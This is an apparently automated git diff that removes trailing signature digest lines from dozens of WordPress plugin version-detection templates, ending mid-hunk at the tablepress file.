a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index fc33bc109d..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022046d634aed143751a1111d8c937c2fff71d5de6108831bb48d485146f046f7a43022100ba9dc437e5b8ff864c39723bc16c455f601cd845753ff90ed6fc689cc18ce5c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 2c03590415..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220659fcc20c90f29e59dd495da1537ac59e0d3e4d4f4b9c9b4472987a554d9953102200717c531e5e4c8f67013cc513c69a3cf226ef82fdf58fd5a7cd619182fe3b38a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 6c893f0d3e..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022078c10743b04b9ec601c6abcf4ab4a78795986c9dc53e3b271df91f44f11dad1e022100e3d282a65e98d2c4c231d54a2367f76178d7fc2a57d7a8175462dca867492c46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index cdacaafb86..00eb1e2dfc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220780078476cd9cf8da22bf0e9de1692612d5221edbc2b8bb1c8b4b3abe11f483e02204faadbaba724dcb374ab90578d3e1322881c3ea76d6c1fbbb37ac5cb439adccc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 2baf610ab2..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022040f477f8f313f793a75c9c90b1723183e3018bb95ed2c1842084de68da60561c022100fee6f4653f1f84f78ac00fe4d5141b09efec5bc5b14dd8d6e1c1f211bab9196f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index c22f40ed64..492d66db68 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220684fd187b5d5e90fd3dcea7f665aa7d3322b000fb9b81750e0624d0f97a8b76a022100c4fd1f8859532865da0d68ad6fa5734fe53d1c98b2f235807851779b3ba20d12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 54c2a23329..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d52168bc605d8427a4102076c3b1ae69e4d05462c47e82886ef401b5c9b0fb830220114bf3f76472792e4e485c0d576e282058b3a29fc0e14e535b0ab6f51d3f355f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 8bb9cf744d..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e6d1d433e5e321b5bfec963f61151481b0c90ebab0575ee07d2509b68dcad9f902200308fcf738f34447e95440a1af03d5b3299ecb6562d6666692ef4392d05e2b25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index ffa21da9a8..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a1d5c4eb686828fba3d1603197531649cdf4f5f9aa88ecd054b82d3b47ce02060221009117dd06c1718ae7049da31de8b1cdf9b45a15a1fbe87d6424d4ae073226c2dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 3da2dab827..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022029ce7232f81e3b051dd5cad0b56c509d9ed9ed9960180766bae869559d87cc590221009c929042b12d165a7039e48bec5a51d0548e48312a53744be20288ce90ac5221:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 56e068a2e9..5f5e8afed5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d92f50d56eeaa97d015732f9bfd1ec66df32115183e832f6e8d0b256957a5f7002210090f2e4b6ff4aecd4d7c37aedd74cd9c7a054022f3be8a9cfdb426366fbf6bbeb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 9edd924f42..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d81ce7d0497a1d294523f65eb5438c141f9d0f9df06093456e724eebc755d115022100c3bba64f7095c868a5614d4a2fbb1f0f5d5cc8227702db27659592953cefb901:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index f7c2240b6d..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205d16acb9b8205d069e334f846be52c5ef8ac4f50017bb9bbbb31939916fb12c30220093a3c0765dc56fde27176087881bf29756539b424b98c81c0ab6b36a7d4dcd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index b6ac546f8e..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e2c7ef226a73f6469b73c591535bcfa7a27c6847730af89b6cd285642439bd8002205a36e360df6a4051283198bdbf690037f5afbd5f64cf0d715dc930932fe2cebb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 097480af77..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cb8ed733cc1555ad4fd5cc974145988db3e170040d0946a21125334292b47bea022100a35d9c960ee3524cc6bfcd6c1ab61cd8fb908faa0de1165f502c6c4c00a482b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 09d89aab88..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202fce55fd16eac8c13329be4ba8f4dca199b61b8a638f62f3881105713e608766022100be6c0ebe6d6420727d0c68a9973939fee3d6361f5cc0e48f080b9c8299b55f8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 809930b93c..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206a6139cf6ee37bb7b7c273d32d8a034292e08e9838bf9825bb4ee47fbb127293022100ee1628b3da4045c48c176d7a3a5c8d8ec5f72399fa35b173d7aa3da435ed0d99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index c93104e9cf..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204567ba9b950eb781161136152674085b76b2b8be2fb3ef05374842bb968a7e060220372d0e8ce190cbffe3ad7737954fb246bc797540b258895a87c5ce49f6bed5a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 4e21480374..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203fb0f945eb1ec01b8d7862cd18b83923f4110144fc8f632e97544fd1a2e30464022100fb75adba21c5ec1dc03bb557e534f5ee4fbc4a51dbf13a1683b4e918022525ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 2d0fa4fa30..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bbad762a7ec34c159695614623589870c1d5d7a8c6b03d8d6d6e78d07d12e481022046deb2a3e02934d2aea12a09e7da78dc3fd2aaac18ca10af4c4a7159565d9c36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 806001a392..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202a210c6481c1e6f80fb05a8e4d7e4c48f0294e973300ed77c1167064e7b78f1b022100cc4c7d6c376ec3eea784a02b25d172e155d663375dbdc10ce72559a70aeed92f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 1bfbd6e088..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100df27de98d34cce19c63620fa41ff328b13bbf8432fbdf88ab075ce38c93b6d70022100e919db6486d0c389c84e656ca4a4396d3ed686b1a97ef6dad5351f52d63a0987:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 6d714ea8cc..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220774127210a3fb9f7971b835962a46f6a24e6b0eb0d427cfa3d57bfee99b3a83002201db1803f2d684f2079673b8b93b8e0890cdc8f2835dc989c680f32db9bce931b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index ed7a23daa0..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203f4ba7c439ff181b93ab15ac0deca01ea5009ae34d45d59fbe2de5bf68ff65350220686dfb8ac979356261a7373f34f6b559a4e9bebf461ae461611fbe0925652720:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 64017121a4..4f99876557 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e0ba579349aa01c5b7fb42c4f57eaa390d4cccdbfa98819f49d2032126123c24022100c5e7cf91c1687b63f67bf045f1cf21f19e86be6562280d69e6f08cd612e0cd71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 614cfe07a1..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b792f5552cfe9a44b81f08e36944442f33c13425ce16e45b10c314b001653715022033a78671374ecb7949a38604d97c6b27b60d1c1d88574ec46c2aa05f8deaaac4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index e5274b3dc1..4e5046273d 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201e4a1946f923a5eb98832c10e250c7fa86035997e28fb92fb816f65e3ba0b9aa0220016d10aa10b1dbe09041b4d04e7adf8e1249994f70803683f82fd3cc431ce9c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index c4db53c298..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210088731e5eccce6db5bea326f9571f9f3bb4f5fae56b30fb78903d47ad4e23a091022100840fb10b0325af0359f448aed9d00f79ed766e1ca94106c473cb77786d304eb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index a68ca67cde..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203eae430fb0b4240bed01e86436376818527622c6a2e2c6255208df0bc7de8242022056a2b1c288eea2581854cad0845d0216fc5914f5c14379251e0a088c1aa0c6ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 75d321c180..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203b542868b00c4b10fe4c1b2cee83f79fc20a3cbc45d6a17aeabb6e368c1c9d3702205bfc78e50f31bd16e19451f4324a018403d3ad823e2007b0bb7e95c004f92065:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index 27403aa2e1..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203d7efccfcfc0ed22f4a773b0c7b409a8776a06bfc4d74cef1b36ca7c406d87370220774f6043791510cae45881afb28fd0e7afb0a611cc72760166f732f0ce1bbd0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 68e24e4a1b..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022075ad10bc7ecd5be965e636a0f86386de178a3aed843fbd2de6ba7d503090f5ce02205bba22b4801ef6859288b938f675dc6977b98ce537b6fd1ffe481f7ddf494de4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 04796d5c23..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022019c26668847a112b6bb06bb6a6ed560c2b263617e0bb827ed2b77f704b776c25022017348dc027cd011b9c48545573636544ff69ef733e199fe37396b07ccc7ffe61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index c577683710..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 480a00453043021f1c473ba317a8528870f28e10078cc4ae5de11d92e6a87a77f7538f4e77542302206995e4f0cb78bf08407d2859b2e21e8dde259f037cbea5d5f6669ec260088f81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 5723fbb04a..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b07b111a0e63fed66aaf34879aa006a99f066c721519bb426dfaf7b47a4442e202204f06761f49523eec3ce45e3a0da1c013e7f410a2aef7198eccb9888239b08a61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 1dd287127c..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220412d100cb4636fe11f042b187e400ba214540c3ee038da1f7707367eb5362e9202205baa029d16fc55602edb10cdc2c8d55d40d16e82f2acdd31180d0f0930424f5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index cc8a5f5de6..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c346670033bbcf1bdb99026c0941fe15029bfa359e33e7937228e32d79b5de9502205e2dfd9544e790e78dbdd303ab711902336ce13712e3a4564c06302ceac23cf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index db6938c944..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a4dcb1a07aae4840b50bb86f7e55ac9269205b805324f7efd3ebd81e18aabaf0022100b43fedfd40abe151ef805cba2471c705e22681db3c7bf26c5ac8050e6487cd8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 4cc88fd84b..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b57ae89b9b3dc1b58cffc5c0a96bfa3f08904c7a5edfab56c63c1554d7bf9dfc022100bc457b3a3b67be15f49a06687c489bc7b8d5aab49c0de79c7406c32d57e5a69b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 3619dec4ff..e7e7c27682 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100921a500c362a4623b327b46df1a8cd31cfe6fe988580d39751b4b4fef135223e022100898ce4bb184c0a05cc830da6a92500712d89040cea75a5d5fc9d8a2d1638390c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index fdb70d6803..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210099fcf6fd3e520638a4ce07496d7d086d512c3d9faa862decf1a927e9f33231cd0220769ac062d5b1b71bbd4ff9153249880dac3d2a9a6b132e358b8d106b1f871743:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 12022e2bf5..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100829beb4af576fe6a86f0738e91938f3358479253f2f871b9f3b4fd28492587e502202f1d17bc7836e50c79f2324dea23312e33689be555cc1743672372988ae74800:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index b67ea8b10a..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bc5e0f5e84b99ee04da58f574074ed01f8893517df9525df8308ca9f604344e7022029221caf57f159ff9b90ffad4fdefc0ae9deb585311fc69e8e8f38c7b5e5a741:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 176de0373d..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022064433d618ad52fa24c8b493c19cd20640827390bed64ef4df04da6923f138bfa022100d963dd0c063717da0deb50a9d9d0f043cc64baf541efdcb18ba291d665c74581:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index f2cbae3670..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ee71412835b93d984a46db2e3509fc737f53cfbcc3e19e653a4e764b1f8a04ad0220062a7ed47fc47c46024f08c893cfe69c57c8b19d32b2ad2518b60e908d490317:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index b492259725..c20ed6552a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206830193716166df911568cab3e7d6ec4bfc796d58cbb0f6120ef4fa5fef0a9600220795b68d8355902ac54279b8279a030812e85929f0326772eab229698e9444756:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 33451699a2..6ac2212b4b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100faae5094049499711c9933afaf7fac5dcf6c0d00de47a6a754c6fcc0e232c3dc022057e9371559d5909710fd659192bf0e05b7f2d137a8966bf8d0cf40f172f28156:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 520c49e760..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ 